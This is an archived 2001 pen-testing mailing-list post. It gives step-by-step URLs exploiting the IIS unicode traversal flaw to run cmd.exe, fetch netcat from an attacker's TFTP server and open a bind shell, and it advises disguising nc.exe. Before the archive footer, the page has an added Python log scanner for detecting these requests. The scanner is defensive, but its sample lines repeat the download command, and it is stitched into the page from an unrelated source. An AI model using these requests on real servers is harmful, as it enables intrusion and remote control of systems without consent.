This is a simple way to take over an IIS web server without the unicode patch. It requires that the firewall has TFTP outbound active and an inbound port available with nothing loaded on it. While several things must occur for this to work, I have had it work twice out of ten assessments, so the odds may still be good. You may want to rename nc.exe to something less obvious.

Get Netcat from your TFTP server:

http://VICTIMADDRESSHERE/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp.exe+-i+TFTPSERVERADDRESSHERE+GET+nc.exe+c:\nc.exe

Start netcat on port 23 or any port that is open inbound, and unused, through the firewall. TCP port 53 works more often than not if DNS has been configured incorrectly.

http://VICTIMADDRESS/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+nc%20-l%20-p%2023%20-t%20-e%20cmd.exe

Telnet to the port on the target system. If it works you should have a c:\ prompt.

----- Original Message -----
From: "Vo0d0o" <voodoooat_private>
To: <pen-testat_private>
Sent: Friday, August 24, 2001 2:29 AM
Subject: Ideas on netcat

To all netcat gurus,

I have been experimenting on netcat for a few days and searching almost every day on netcat for some possible uses, but in vain. As far as I know, no site is giving some other uses of netcat pertaining to pen-testing, other than the usual *README* file, which I find too basic. I would be grateful if anybody could throw some light on uses of netcat in pen-testing.

Thanx in advance.

Cheers,
Kartik.

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
----------------------------------------------------------------------------
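A defender-side check for the request pattern in the message above, as an added example that is not part of the original post: it percent-decodes each logged URI until it stops changing and flags directory traversal that reaches cmd.exe. The log lines, the five-field layout and the function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample lines: "client method uri-stem uri-query status".
# The stem may be logged raw or already decoded once, so both forms appear.
SAMPLE_LOG = r"""
192.0.2.10 GET /default.htm - 200
192.0.2.77 GET /scripts/..%255c../..%255c../winnt/system32/cmd.exe /c+dir 200
192.0.2.77 GET /scripts/..%5c../winnt/system32/cmd.exe /c+tftp.exe+-i+198.51.100.5+GET+nc.exe+c:\nc.exe 200
192.0.2.10 GET /docs/cmd.exe-notes.htm - 404
"""

TRAVERSAL = re.compile(r"\.\.[\\/]")                 # "../" or "..\" after decoding
SHELL = re.compile(r"cmd\.exe", re.I)
TOOLS = re.compile(r"\b(tftp|nc)(\.exe)?\b", re.I)  # tools named in the post

def fully_decode(value, max_rounds=5):
    """Percent-decode until stable; returns (text, rounds that changed it)."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds

def scan(log_text):
    """Return (client, decoded_path, reasons) for traversal requests that reach cmd.exe."""
    findings = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue  # blank or malformed line
        client, _method, stem, query, _status = parts
        path, rounds = fully_decode(stem)
        if not (TRAVERSAL.search(path) and SHELL.search(path)):
            continue  # cmd.exe in a file name alone is not enough
        reasons = ["multi-encoded"] if rounds > 1 else []
        reasons += ["traversal", "shell"]
        command, _ = fully_decode(query.replace("+", " "))
        if TOOLS.search(command):
            reasons.append("tool-in-query")
        findings.append((client, path, reasons))
    return findings

if __name__ == "__main__":
    for client, path, reasons in scan(SAMPLE_LOG):
        print(client, path, ",".join(reasons))
```

Decoding to a fixed point matters because a filter that decodes only once sees `..%5c` rather than `..\` and lets the request through.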
This archive was generated by hypermail 2b30 : Wed Aug 29 2001 - 11:50:18 PDT